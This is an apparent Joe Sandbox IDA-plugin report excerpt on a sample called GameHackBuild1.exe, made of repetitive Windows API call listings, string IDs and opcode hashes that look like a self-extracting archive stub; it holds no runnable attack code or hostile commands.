                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: b650351f7bef9b2a5f625702f8dc46dff2b2e4f2ef9f2a18ce1d7e3d4a8d7df9
                                      • Instruction ID: ca254aaff9d006d137678aba46e152a5cc4a34ebdb00b435484a21668cc2c7b6
                                      • Opcode Fuzzy Hash: b650351f7bef9b2a5f625702f8dc46dff2b2e4f2ef9f2a18ce1d7e3d4a8d7df9
                                      • Instruction Fuzzy Hash: 3F01B172A12221BF272157BE7C88C7B6B6EDAC6BA13140238B904C2110DF75CD02A1B0
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,00A2895F,00A285FB,?,00A28FD3,00000001,00000364,?,00A2388F,?,?,00A40F50), ref: 00A2902E
                                      • _free.LIBCMT ref: 00A29063
                                      • _free.LIBCMT ref: 00A2908A
                                      • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A29097
                                      • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A290A0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 2796c8691780d805ac07c91dedc57de8d9f7a98800187e1a3340d9f7bf96c0e1
                                      • Instruction ID: 3e49efab8a29cff392eb9035400746899b2c6705038d0b70f6941df21c908014
                                      • Opcode Fuzzy Hash: 2796c8691780d805ac07c91dedc57de8d9f7a98800187e1a3340d9f7bf96c0e1
                                      • Instruction Fuzzy Hash: 5601787210EB342B9332A3BC7E8592B262D9BC1F71B200038F506D2292EF38CC021060
                                      APIs
                                        • Part of subcall function 00A10A41: ResetEvent.KERNEL32(?), ref: 00A10A53
                                        • Part of subcall function 00A10A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00A10A67
                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00A1078F
                                      • CloseHandle.KERNEL32(?,?), ref: 00A107A9
                                      • DeleteCriticalSection.KERNEL32(?), ref: 00A107C2
                                      • CloseHandle.KERNEL32(?), ref: 00A107CE
                                      • CloseHandle.KERNEL32(?), ref: 00A107DA
                                        • Part of subcall function 00A1084E: WaitForSingleObject.KERNEL32(?,000000FF,00A1096D,?,?,00A109EF,?,?,?,?,?,00A109D9), ref: 00A10854
                                        • Part of subcall function 00A1084E: GetLastError.KERNEL32(?,?,00A109EF,?,?,?,?,?,00A109D9), ref: 00A10860
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 1868215902-0
                                      • Opcode ID: ab9ca01c23941eb7cde63fde085a5e4a83b0278d63ca2c78346bc373a99895d7
                                      • Instruction ID: 99355d5792e252be3104139abfa2a3e015d3ae031727a0a2002380a9d8fecf54
                                      • Opcode Fuzzy Hash: ab9ca01c23941eb7cde63fde085a5e4a83b0278d63ca2c78346bc373a99895d7
                                      • Instruction Fuzzy Hash: 10019272544B04EBCB22DB65DD84FC6BBE9FB49711F000519F15A821A0CBB56A85CB90
                                      APIs
                                      • _free.LIBCMT ref: 00A2BF28
                                        • Part of subcall function 00A284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?), ref: 00A284F4
                                        • Part of subcall function 00A284DE: GetLastError.KERNEL32(?,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?,?), ref: 00A28506
                                      • _free.LIBCMT ref: 00A2BF3A
                                      • _free.LIBCMT ref: 00A2BF4C
                                      • _free.LIBCMT ref: 00A2BF5E
                                      • _free.LIBCMT ref: 00A2BF70
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: b090a8909747f3aa616bddc4acf38b7336b7330bf595225a51d37b11e0bf249b
                                      • Instruction ID: 8b9cd57a0181cefb170ac7853303d56dfc6f7459f2638b98799b583ae9aa2b5b
                                      • Opcode Fuzzy Hash: b090a8909747f3aa616bddc4acf38b7336b7330bf595225a51d37b11e0bf249b
                                      • Instruction Fuzzy Hash: 73F01D32519225AB8620EBACFF86C1A73E9BA007507648869F448D7D94CB34FC818A64
                                      APIs
                                      • _free.LIBCMT ref: 00A2807E
                                        • Part of subcall function 00A284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?), ref: 00A284F4
                                        • Part of subcall function 00A284DE: GetLastError.KERNEL32(?,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?,?), ref: 00A28506
                                      • _free.LIBCMT ref: 00A28090
                                      • _free.LIBCMT ref: 00A280A3
                                      • _free.LIBCMT ref: 00A280B4
                                      • _free.LIBCMT ref: 00A280C5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe,00000104), ref: 00A276FD
                                      • _free.LIBCMT ref: 00A277C8
                                      • _free.LIBCMT ref: 00A277D2
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                      • API String ID: 2506810119-2682362612
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A07579
                                        • Part of subcall function 00A03B3D: __EH_prolog.LIBCMT ref: 00A03B42
                                      • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00A07640
                                        • Part of subcall function 00A07BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A07C04
                                        • Part of subcall function 00A07BF5: GetLastError.KERNEL32 ref: 00A07C4A
                                        • Part of subcall function 00A07BF5: CloseHandle.KERNEL32(?), ref: 00A07C59
                                      Similarity
                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 3813983858-639343689
                                      APIs
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      • EndDialog.USER32(?,00000001), ref: 00A1A4B8
                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00A1A4CD
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A1A4E2
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 445417207-3402441367
                                      Similarity
                                      • API ID: __fprintf_l_strncpy
                                      • String ID: $%s$@%s
                                      • API String ID: 1857242416-834177443
                                      APIs
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      • EndDialog.USER32(?,00000001), ref: 00A1A9DE
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00A1A9F6
                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 00A1AA24
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: GETPASSWORD1
                                      • API String ID: 445417207-3292211884
                                      APIs
                                      • _swprintf.LIBCMT ref: 00A0B51E
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                      • _wcschr.LIBVCRUNTIME ref: 00A0B53C
                                      • _wcschr.LIBVCRUNTIME ref: 00A0B54C
                                      Similarity
                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                      • String ID: %c:\
                                      • API String ID: 525462905-3142399695
                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00A0ABC5,00000008,?,00000000,?,00A0CB88,?,00000000), ref: 00A106F3
                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00A0ABC5,00000008,?,00000000,?,00A0CB88,?,00000000), ref: 00A106FD
                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00A0ABC5,00000008,?,00000000,?,00A0CB88,?,00000000), ref: 00A1070D
                                      Strings
                                      • Thread pool initialization failed., xrefs: 00A10725
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      APIs
                                      • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00A1D29D
                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A1D2D9
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 1431749950-3493335439
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      APIs
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00A080B7,?,?,?), ref: 00A0A351
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00A080B7,?,?), ref: 00A0A395
                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00A080B7,?,?,?,?,?,?,?,?), ref: 00A0A416
                                      • CloseHandle.KERNEL32(?,?,00000000,?,00A080B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00A0A41D
                                      Similarity
                                      • API ID: File$Create$CloseHandleTime
                                      • String ID:
                                      • API String ID: 2287278272-0
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,3FE85006,00A23F66,00000000,00000000,00A24F9B,?,00A24F9B,?,00000001,00A23F66,3FE85006,00000001,00A24F9B,00A24F9B), ref: 00A2C0E6
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A2C16F
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A2C181
                                      • __freea.LIBCMT ref: 00A2C18A
                                        • Part of subcall function 00A28518: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23A26,?,0000015D,?,?,?,?,00A24F02,000000FF,00000000,?,?), ref: 00A2854A
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00A2251A
                                        • Part of subcall function 00A22B52: ___AdjustPointer.LIBCMT ref: 00A22B9C
                                      • _UnwindNestedFrames.LIBCMT ref: 00A22531
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00A22543
                                      • CallCatchBlock.LIBVCRUNTIME ref: 00A22567
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID:
                                      • API String ID: 2633735394-0
                                      • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction ID: 42e9bb1c7a132408b4157787edab476dd93eb46f008c4a535af681a6bd557356
                                      • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction Fuzzy Hash: 5F012532000118BFCF129F69ED01EDA3BBAEF58714F058124FD1866120C376E9A1EBA1
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00A19DBE
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A19DCD
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A19DDB
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00A19DE9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 2918052e8a795c240f4a5f006118d2dfae4ad3352b2300c7bed9a49c2227c63d
                                      • Instruction ID: 26a09c81858f20c4fae62ed02d9e9eb2868746805e0df57d38c2e05681b57e13
                                      • Opcode Fuzzy Hash: 2918052e8a795c240f4a5f006118d2dfae4ad3352b2300c7bed9a49c2227c63d
                                      • Instruction Fuzzy Hash: 82E0EC39985A21A7D3209BE5BD0DB8F3B74AB0AB62F060005FB05A6190DAB44846CB90
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00A22016
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00A2201B
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00A22020
                                        • Part of subcall function 00A2310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00A2311F
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00A22035
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction ID: 4d2816a3c64bd502d2bbecd7e21a4841cb91aa5e0763e70e5cef61d02fa40565
                                      • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction Fuzzy Hash: E6C04836018670F41C223BBE33027BD0B000D63BC5BA226F2ED801B543DE0E0F2AA232
                                      APIs
                                        • Part of subcall function 00A19DF1: GetDC.USER32(00000000), ref: 00A19DF5
                                        • Part of subcall function 00A19DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A19E00
                                        • Part of subcall function 00A19DF1: ReleaseDC.USER32(00000000,00000000), ref: 00A19E0B
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00A19F8D
                                        • Part of subcall function 00A1A1E5: GetDC.USER32(00000000), ref: 00A1A1EE
                                        • Part of subcall function 00A1A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00A1A21D
                                        • Part of subcall function 00A1A1E5: ReleaseDC.USER32(00000000,?), ref: 00A1A2B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID: (
                                      • API String ID: 1061551593-3887548279
                                      • Opcode ID: 49ce8299d188e5bf269a0d2f264320fc26f7c8b3ea35480c8d37af5a7f17c1c9
                                      • Instruction ID: 2622ba8bf5eb3cf9781cf40f70758bb755b82294a7f7d225b8a898517bcfd9b1
                                      • Opcode Fuzzy Hash: 49ce8299d188e5bf269a0d2f264320fc26f7c8b3ea35480c8d37af5a7f17c1c9
                                      • Instruction Fuzzy Hash: F8811371608214AFC614DFA9CC44A6BBBF9FF98700F00491DF98AD7260CB75AD06CB52
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _swprintf
                                      • String ID: %ls$%s: %s
                                      • API String ID: 589789837-2259941744
                                      • Opcode ID: f2b7016e06f56a0838b56bf906c677226ee5deecfd424dec57a5d2a87e8f81eb
                                      • Instruction ID: 5e798fefcf7a5a47df63c7d8cb53b895fc252430d8a25df75fbb042a89317bb3
                                      • Opcode Fuzzy Hash: f2b7016e06f56a0838b56bf906c677226ee5deecfd424dec57a5d2a87e8f81eb
                                      • Instruction Fuzzy Hash: 8A51B73568C704FEEA211AE4DD43FF67A76EB08B00F248906F7DB648D5C6E255D0A613
                                      APIs
                                      • _free.LIBCMT ref: 00A2AA84
                                        • Part of subcall function 00A28849: IsProcessorFeaturePresent.KERNEL32(00000017,00A28838,0000002C,00A3BC40,00A2BA17,00000000,00000000,00A29028,?,?,00A28845,00000000,00000000,00000000,00000000,00000000), ref: 00A2884B
                                        • Part of subcall function 00A28849: GetCurrentProcess.KERNEL32(C0000417,00A3BC40,0000002C,00A28576,00000016,00A29028), ref: 00A2886D
                                        • Part of subcall function 00A28849: TerminateProcess.KERNEL32(00000000), ref: 00A28874
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: *?$.
                                      • API String ID: 2667617558-3972193922
                                      • Opcode ID: 8da25cd4491836bc39a0a284343e386c4d4306b0af38769002cbed5a576452a2
                                      • Instruction ID: ac0762c97351b40225c169ae6814ac4e547b770662b630e1094ae4b58deea03a
                                      • Opcode Fuzzy Hash: 8da25cd4491836bc39a0a284343e386c4d4306b0af38769002cbed5a576452a2
                                      • Instruction Fuzzy Hash: BD51B071E0022AAFDF14DFACD981AADB7B5EF68310F258179E844E7300E6359E41CB51
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A07730
                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A078CC
                                        • Part of subcall function 00A0A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A0A27A,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A458
                                        • Part of subcall function 00A0A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A0A27A,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A489
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: File$Attributes$H_prologTime
                                      • String ID: :
                                      • API String ID: 1861295151-336475711
                                      • Opcode ID: 1bf9919cce236f9d7391c65d6fedef3bf602a31a5e46ca559b1f5104a7f5951b
                                      • Instruction ID: 991df0c6d75a481f39ba21496e27c76995b33234eff5590b3713490124225fd0
                                      • Opcode Fuzzy Hash: 1bf9919cce236f9d7391c65d6fedef3bf602a31a5e46ca559b1f5104a7f5951b
                                      • Instruction Fuzzy Hash: 73414371C0525CAADB25EB50EE55EEEB37CAF45340F0080DAB609A20D2DB746F88CF61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UNC$\\?\
                                      • API String ID: 0-253988292
                                      • Opcode ID: 900dabe9da1e24642be7fc51a660d4f9fce64123d38d653b42d1941bbe73a8be
